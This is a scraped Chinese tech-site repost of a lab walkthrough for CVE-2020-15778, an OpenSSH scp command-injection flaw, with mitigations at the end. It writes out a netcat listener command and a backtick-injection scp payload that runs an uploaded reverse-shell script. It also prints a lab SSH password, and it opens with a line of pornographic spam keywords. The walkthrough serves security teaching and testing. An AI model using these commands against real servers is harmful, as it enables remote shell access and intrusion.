国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CVE-2020-15778 OpenSSH命令注入漏洞

這篇具有很好參考價(jià)值的文章主要介紹了CVE-2020-15778 OpenSSH命令注入漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

預(yù)備知識(shí)
漏洞描述

OpenSSH8.3p1及之前版本中scp的scp.c文件存在操作系統(tǒng)命令注入漏洞。該漏洞即使在禁用ssh登錄的情況下,但是允許使用scp傳文件,而且遠(yuǎn)程服務(wù)器允許使用反引號(hào)(`)。攻擊者可利用scp復(fù)制文件到遠(yuǎn)程服務(wù)器時(shí),執(zhí)行帶有payload的scp命令,從而在后續(xù)利用中g(shù)etshell。

OpenSSH簡(jiǎn)介

OpenSSH是 SSH(Secure SHell) 協(xié)議的免費(fèi)開源實(shí)現(xiàn)。SSH協(xié)議族可以用來(lái)進(jìn)行遠(yuǎn)程控制,或在計(jì)算機(jī)之間傳送文件。而實(shí)現(xiàn)此功能的傳統(tǒng)方式,如telnet(終端仿真協(xié)議)、rcpftp、rlogin、rsh都是極為不安全的,并且會(huì)使用明文傳送密碼。OpenSSH提供了服務(wù)端后臺(tái)程序和客戶端工具,用來(lái)加密遠(yuǎn)程控制和文件傳輸過程中的數(shù)據(jù),并由此來(lái)代替原來(lái)的類似服務(wù)。

scp命令簡(jiǎn)介

scp 是安全拷貝協(xié)議(Secure Copy Protocol)的縮寫,和眾多Linux/Unix 使用者所熟知的拷貝(cp)命令一樣。scp的使用方式類似于cp 命令,cp命令將一個(gè)文件或文件夾從本地操作系統(tǒng)的一個(gè)位置(源)拷貝到目標(biāo)位置(目的),而scp用來(lái)將文件或文件夾從網(wǎng)絡(luò)上的一個(gè)主機(jī)拷貝到另一個(gè)主機(jī)當(dāng)中去。

scp一些基本參數(shù)如下:

-B?采取批量模式(避免詢問密碼或口令)

-C?啟用壓縮,通過指明-C參數(shù)來(lái)開啟壓縮模式。

-c?加密方式,選擇在傳輸過程中用來(lái)加密的加密方式 這個(gè)選項(xiàng)會(huì)被直接傳遞到ssh。

-F?ssh配置,給ssh指定一個(gè)用來(lái)替代默認(rèn)配置的配置文件。這個(gè)選項(xiàng)會(huì)被直接傳遞到ssh。

-l?限速,限制命令使用的帶寬,默認(rèn)單位是 Kbit/s。

-P?端口,指定需要的連接的遠(yuǎn)程主機(jī)的端口。

注意,這個(gè)選項(xiàng)使用的是一個(gè)大寫的“P”,因?yàn)樾懙摹?p”已經(jīng)用來(lái)保留目標(biāo)文件的時(shí)間和模式相關(guān)信息。(ssh命令中使用小寫的“-p”來(lái)指定目標(biāo)端口。)

-p?保留文件原來(lái)的修改時(shí)間,訪問時(shí)間以及權(quán)限模式。

-q?靜默模式:不顯示來(lái)自ssh命令的進(jìn)度信息,警告和診斷信息。

-r?遞歸拷貝整個(gè)目錄。

注意,scp 命令在樹形遍歷的時(shí)候同樣會(huì)跟隨符號(hào)連接,復(fù)制所連接的文件。

-v?詳細(xì)模式。scp和ssh將會(huì)打印出處理過程中的調(diào)試信息。這可以幫助你調(diào)試連接、認(rèn)證和配置方面的問題。

實(shí)驗(yàn)?zāi)康?/strong>
scp是secure copy的縮寫。在linux系統(tǒng)中,scp用于linux之間復(fù)制文件和目錄,基于ssh登陸進(jìn)行安全的遠(yuǎn)程文件拷貝命令。該命令由openssh的scp.c及其他相關(guān)代碼實(shí)現(xiàn),通過這次實(shí)驗(yàn)?zāi)銓⒘私獾酵ㄟ^scp進(jìn)行反彈shell的操作。

實(shí)驗(yàn)環(huán)境
目標(biāo)機(jī)器:CentOS、IP:10.1.1.200

攻擊機(jī)器:Kali

實(shí)驗(yàn)步驟一
確定目標(biāo)機(jī)器是否存在漏洞,測(cè)試ssh與scp的使用情況。


1、目標(biāo)機(jī)器查看ssh版本,是否在OpenSSH 8.3p1及之前
CVE-2020-15778 OpenSSH命令注入漏洞
在OpenSSH8.3p1及之前說(shuō)明存在操作系統(tǒng)命令注入漏洞。

2、攻擊機(jī)器測(cè)試ssh與scp的使用情況:

CVE-2020-15778 OpenSSH命令注入漏洞
1.txt中為測(cè)試內(nèi)容,這里顯示可以使用:
ssh密碼:pA2sw0rb

實(shí)驗(yàn)步驟二
使用scp進(jìn)行反彈shell的操作


首先在攻擊機(jī)上創(chuàng)建一個(gè)linux的可執(zhí)行的文件,并寫入一個(gè)反彈shell的命令
CVE-2020-15778 OpenSSH命令注入漏洞?? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
使用scp命令,把該文件上傳到目標(biāo)機(jī)器的/tmp下,在tmp錄下任何用戶都是擁有讀、寫、執(zhí)行的權(quán)限
scp RAI.sh root@10.1.1.200:/tmp/RAI.sh
CVE-2020-15778 OpenSSH命令注入漏洞
在kali上開啟監(jiān)聽

nc -vv -lvvp 5555
CVE-2020-15778 OpenSSH命令注入漏洞
使用poc遠(yuǎn)程執(zhí)行命令

scp zm.sh root@目標(biāo)地址:'`sh /tmp/zm.sh`'
CVE-2020-15778 OpenSSH命令注入漏洞
可以看到我們的shell已經(jīng)彈回來(lái)了
CVE-2020-15778 OpenSSH命令注入漏洞
實(shí)驗(yàn)步驟三
簡(jiǎn)述漏洞原理


使用scp復(fù)制文件到遠(yuǎn)程服務(wù)器時(shí),在scp命令后面跟上文件的路徑,具體格式如下:

scp Filename user@host:directory/Filename

在上述過程中,scp會(huì)使用”-t“參數(shù)來(lái)獲取存儲(chǔ)傳入文件的路徑,如下:

scp -t directory/Filename
CVE-2020-15778 OpenSSH命令注入漏洞
問題就存在這個(gè)地方,也就是如圖"scp.c"文件的991行。這個(gè)地方未對(duì)傳入的文件路徑進(jìn)行檢測(cè)防護(hù),攻擊者可以使用反引號(hào)包裹payload然后加上文件名執(zhí)行scp命令,這時(shí)payload將會(huì)發(fā)送到遠(yuǎn)程服務(wù)器并執(zhí)行。

修復(fù)方案
目前廠商暫未發(fā)布修復(fù)措施解決此安全問題,等待官方補(bǔ)丁?https://www.openssh.com/

臨時(shí)修復(fù)方案:

1、 加強(qiáng)ssh密碼或密鑰的保護(hù),周期性更換密碼或密鑰
2、 使用rsync代替scp

具體實(shí)踐:

CVE-2020-15778 OpenSSH命令注入漏洞

CVE-2020-15778 OpenSSH命令注入漏洞?CVE-2020-15778 OpenSSH命令注入漏洞

CVE-2020-15778 OpenSSH命令注入漏洞

CVE-2020-15778 OpenSSH命令注入漏洞

?CVE-2020-15778 OpenSSH命令注入漏洞文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-490993.html

到了這里,關(guān)于CVE-2020-15778 OpenSSH命令注入漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • MICROSOFT OFFICE MSDT操作系統(tǒng)命令注入漏洞(CVE-2022-30190)

    MICROSOFT OFFICE MSDT操作系統(tǒng)命令注入漏洞(CVE-2022-30190)

    目錄 漏洞概述 受到影響的產(chǎn)品和版本 漏洞復(fù)現(xiàn) 1、搭建靶場(chǎng) 2、攻擊復(fù)現(xiàn) 一、執(zhí)行系統(tǒng)程序 二、執(zhí)行系統(tǒng)命令 修復(fù) Microsoft Windows Support Diagnostic Tool是美國(guó)微軟(Microsoft)公司的收集信息以發(fā)送給 Microsoft 支持的工具(Windows上的微軟支持診斷工具中存在此漏洞)。當(dāng)從Word等

    2024年02月06日
    瀏覽(19)
  • 安全生產(chǎn):CVE-2020-11022/CVE-2020-11023漏洞解析

    安全生產(chǎn):CVE-2020-11022/CVE-2020-11023漏洞解析

    代碼安全掃描階段,前端資源審計(jì)發(fā)現(xiàn) jQuery 版本過低導(dǎo)致生產(chǎn)系統(tǒng)存在 CVE-2020-11022/CVE-2020-11023 類風(fēng)險(xiǎn)。且影響范圍: jQuery = 1.0.3 3.5.0 。 該類風(fēng)險(xiǎn)為應(yīng)用安全缺陷類DXSS攻擊,攻擊者可以利用該漏洞注入惡意腳本代碼,并在受害者的瀏覽器上執(zhí)行。將導(dǎo)致受害者的個(gè)人信息泄

    2024年02月05日
    瀏覽(26)
  • Weblogic未授權(quán)訪問漏洞-CVE-2020-14882&&CVE-2020-14883

    Weblogic未授權(quán)訪問漏洞-CVE-2020-14882&&CVE-2020-14883

    Weblogic未授權(quán)訪問漏洞-CVE-2020-14882CVE-2020-14883 Weblogic 管理控制臺(tái)未授權(quán)遠(yuǎn)程命令執(zhí)行漏洞(CVE-2020-14882,CVE-2020-14883)。 CVE-2020-14882:允許未授權(quán)的用戶繞過管理控制臺(tái)的權(quán)限驗(yàn)證訪問后臺(tái) CVE-2020-14883:允許后臺(tái)任意用戶通過HTTP協(xié)議執(zhí)行任意命令 使用這兩個(gè)漏洞組成的利用鏈,可通

    2024年02月16日
    瀏覽(21)
  • Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Apache Log4j是一個(gè)用于Java的日志記錄庫(kù),其支持啟動(dòng)遠(yuǎn)程日志服務(wù)器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執(zhí)行任意代碼 環(huán)境:vulhub 工具下載地址: ysoserial 利用工具生成payload: 1.創(chuàng)建文件 進(jìn)入容器內(nèi)部,查看文件創(chuàng)建成功 2.查看反彈的shell 有點(diǎn)

    2024年02月11日
    瀏覽(37)
  • jQuery版本低引起的漏洞——CVE-2020-11022/CVE-2020-11023

    jQuery版本低引起的漏洞——CVE-2020-11022/CVE-2020-11023

    漏洞號(hào): CVE-2020-11022 / CVE-2020-11023 影響范圍:jQuery = 1.0.3 3.5.0 漏洞原理 見:jQuery最新xss漏洞分析——CVE-2020-11022/11023 - 云+社區(qū) - 騰訊云 (tencent.com) 漏洞復(fù)現(xiàn) https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html 要想在項(xiàng)目本地實(shí)現(xiàn),可把該html保存下來(lái),修改script的src屬性為項(xiàng)目引用j

    2023年04月26日
    瀏覽(21)
  • 漏洞修復(fù)--OpenSSH權(quán)限提升漏洞(CVE-2021-41617)

    漏洞修復(fù)--OpenSSH權(quán)限提升漏洞(CVE-2021-41617)

    官方已發(fā)布安全版本修復(fù)漏洞,騰訊安全專家建議受影響的用戶請(qǐng)盡快更新至安全版本。 安全版本:OpenSSH 8.8 用戶可根據(jù)所使用的發(fā)行版本,升級(jí)修復(fù)。 查看OpenSSH版本:rpm -qa | grep openssh 升級(jí)OpenSSL版本:yum -y install openssh centos7 用戶,建議升級(jí)到如下版本:openssh-7.4p1-22.el7

    2024年02月15日
    瀏覽(37)
  • 記一次修復(fù)漏洞(OpenSSH 安全漏洞(CVE-2023-28531))CentOS升級(jí)openssh

    1.查看當(dāng)前openssl和openssh版本 2.安裝并啟用telnet服務(wù)(防止升級(jí)過程無(wú)法連接機(jī)器) 設(shè)置開機(jī)自啟 啟動(dòng)服務(wù) 檢查服務(wù)是否開啟: 開啟root用戶在telnet登陸: ? 3.配置防火墻(關(guān)閉防火墻可不配置) 法一:直接對(duì)外開發(fā)23端口(高風(fēng)險(xiǎn)) ?#--permanent 為永久開啟,不加此參數(shù)重啟

    2024年02月06日
    瀏覽(54)
  • CVE-2020-14882&14883漏洞復(fù)現(xiàn)

    CVE-2020-14882&14883漏洞復(fù)現(xiàn)

    漏洞介紹 ? 在2020年10月的更新中,Oracle官方修復(fù)了兩個(gè)長(zhǎng)亭科技安全研究員提交的安全漏洞,分別是CVE-2020-14882和CVE-2020-14882。 CVE-2020-14882 允許遠(yuǎn)程用戶規(guī)避控制臺(tái)組件中的身份驗(yàn)證。導(dǎo)致此漏洞的原因是服務(wù)器 URL 的路徑遍歷黑名單配置不當(dāng),可以在 WebLogic HTTP 訪問的處理

    2023年04月24日
    瀏覽(22)
  • Openssh高危漏洞CVE-2023-38408修復(fù)方案

    Openssh高危漏洞CVE-2023-38408修復(fù)方案

    2023年07月21日,360CERT監(jiān)測(cè)發(fā)現(xiàn) OpenSSH 發(fā)布了 OpenSSH 的風(fēng)險(xiǎn)通告,漏洞編號(hào)為 CVE-2023-38408 ,漏洞等級(jí): 高危 ,漏洞評(píng)分: 8.1 。 OpenSSH 是 Secure Shell (SSH) 協(xié)議的開源實(shí)現(xiàn),提供一套全面的服務(wù),以促進(jìn)客戶端-服 務(wù)器環(huán)境中不安全網(wǎng)絡(luò)上的加密通信。 威脅等級(jí) 高 影響面 廣泛

    2024年02月11日
    瀏覽(21)
  • Tomcat文件包含漏洞(CVE-2020-1938)

    Tomcat文件包含漏洞(CVE-2020-1938)

    注意:僅用于技術(shù)討論,切勿用于其他用途,一切后果與本人無(wú)關(guān)?。?! 漏洞介紹 Java 是目前 Web 開發(fā)中最主流的編程語(yǔ)言,而 Tomcat 是當(dāng)前最流行的 Java 中間件服務(wù)器之一,從初版發(fā)布到現(xiàn)在已經(jīng)有二十多年歷史,在世界范圍內(nèi)廣泛使用。 Ghostcat(幽靈貓) 是由長(zhǎng)亭科技安

    2024年02月05日
    瀏覽(18)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包